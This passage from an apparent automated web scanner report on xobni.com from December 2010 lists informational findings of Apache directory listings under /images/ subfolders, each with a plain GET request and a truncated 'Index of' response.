User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:33 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 2174
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/client</title>
</head>
<body>
<h1>Index of /images/client</h1>
<table><tr><th><img src="/icons/blank.
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.10. http://www.xobni.com/images/company/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/company/

Request

GET /images/company/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:10:11 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 2932
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/company</title>
</head>
<body>
<h1>Index of /images/company</h1>
<table><tr><th><img src="/icons/blan
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.11. http://www.xobni.com/images/company/adayat/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/company/adayat/

Request

GET /images/company/adayat/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/company/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:28 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 3670
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/company/adayat</title>
</head>
<body>
<h1>Index of /images/company/adayat</h1>
<table><tr><th><img sr
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/company/">Parent Directory</a>
...[SNIP]...

13.12. http://www.xobni.com/images/company/carousel/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/company/carousel/

Request

GET /images/company/carousel/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:04:15 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 7642
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/company/carousel</title>
</head>
<body>
<h1>Index of /images/company/carousel</h1>
<table><tr><th><im
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/company/">Parent Directory</a>
...[SNIP]...

13.13. http://www.xobni.com/images/company/team/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/company/team/

Request

GET /images/company/team/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/company/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:29 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 4152
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/company/team</title>
</head>
<body>
<h1>Index of /images/company/team</h1>
<table><tr><th><img src="/
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/company/">Parent Directory</a>
...[SNIP]...

13.14. http://www.xobni.com/images/features/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/features/

Request

GET /images/features/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:33 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 2162
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/features</title>
</head>
<body>
<h1>Index of /images/features</h1>
<table><tr><th><img src="/icons/bl
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.15. http://www.xobni.com/images/gadgets/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/gadgets/

Request

GET /images/gadgets/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:34 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1248
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/gadgets</title>
</head>
<body>
<h1>Index of /images/gadgets</h1>
<table><tr><th><img src="/icons/blan
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.16. http://www.xobni.com/images/headers/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/headers/

Request

GET /images/headers/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:35 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1882
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/headers</title>
</head>
<body>
<h1>Index of /images/headers</h1>
<table><tr><th><img src="/icons/blan
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.17. http://www.xobni.com/images/highlights/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/highlights/

Request

GET /images/highlights/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:35 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1604
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/highlights</title>
</head>
<body>
<h1>Index of /images/highlights</h1>
<table><tr><th><img src="/icon
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.18. http://www.xobni.com/images/howto/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/howto/

Request

GET /images/howto/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:35 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1498
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/howto</title>
</head>
<body>
<h1>Index of /images/howto</h1>
<table><tr><th><img src="/icons/blank.gi
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.19. http://www.xobni.com/images/icons/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/icons/

Request

GET /images/icons/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:32 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 4294
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/icons</title>
</head>
<body>
<h1>Index of /images/icons</h1>
<table><tr><th><img src="/icons/blank.gi
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.20. http://www.xobni.com/images/installer/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/installer/

Request

GET /images/installer/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:35 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1352
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/installer</title>
</head>
<body>
<h1>Index of /images/installer</h1>
<table><tr><th><img src="/icons/
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.21. http://www.xobni.com/images/jobs/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/jobs/

Request

GET /images/jobs/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:35 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 2122
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/jobs</title>
</head>
<body>
<h1>Index of /images/jobs</h1>
<table><tr><th><img src="/icons/blank.gif"
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.22. http://www.xobni.com/images/linkedin_proxy/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/linkedin_proxy/

Request

GET /images/linkedin_proxy/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:36 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 846
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/linkedin_proxy</title>
</head>
<body>
<h1>Index of /images/linkedin_proxy</h1>
<table><tr><th><img sr
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.23. http://www.xobni.com/images/mascot/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/mascot/

Request

GET /images/mascot/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:36 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 830
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/mascot</title>
</head>
<body>
<h1>Index of /images/mascot</h1>
<table><tr><th><img src="/icons/blank.
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.24. http://www.xobni.com/images/partners/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/partners/

Request

GET /images/partners/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:36 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 3952
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/partners</title>
</head>
<body>
<h1>Index of /images/partners</h1>
<table><tr><th><img src="/icons/bl
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.25. http://www.xobni.com/images/parts/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/parts/

Request

GET /images/parts/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:36 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1216
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/parts</title>
</head>
<body>
<h1>Index of /images/parts</h1>
<table><tr><th><img src="/icons/blank.gi
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.26. http://www.xobni.com/images/press/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/press/

Request

GET /images/press/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:37 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 5190
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/press</title>
</head>
<body>
<h1>Index of /images/press</h1>
<table><tr><th><img src="/icons/blank.gi
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.27. http://www.xobni.com/images/promo/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/promo/

Request

GET /images/promo/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:37 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1196
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/promo</title>
</head>
<body>
<h1>Index of /images/promo</h1>
<table><tr><th><img src="/icons/blank.gi
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.28. http://www.xobni.com/images/screenshots/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/screenshots/

Request

GET /images/screenshots/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:37 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 6492
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/screenshots</title>
</head>
<body>
<h1>Index of /images/screenshots</h1>
<table><tr><th><img src="/ic
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.29. http://www.xobni.com/images/store/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/store/

Request

GET /images/store/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:37 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1034
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/store</title>
</head>
<body>
<h1>Index of /images/store</h1>
<table><tr><th><img src="/icons/blank.gi
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.30. http://www.xobni.com/images/structure/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/structure/

Request

GET /images/structure/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
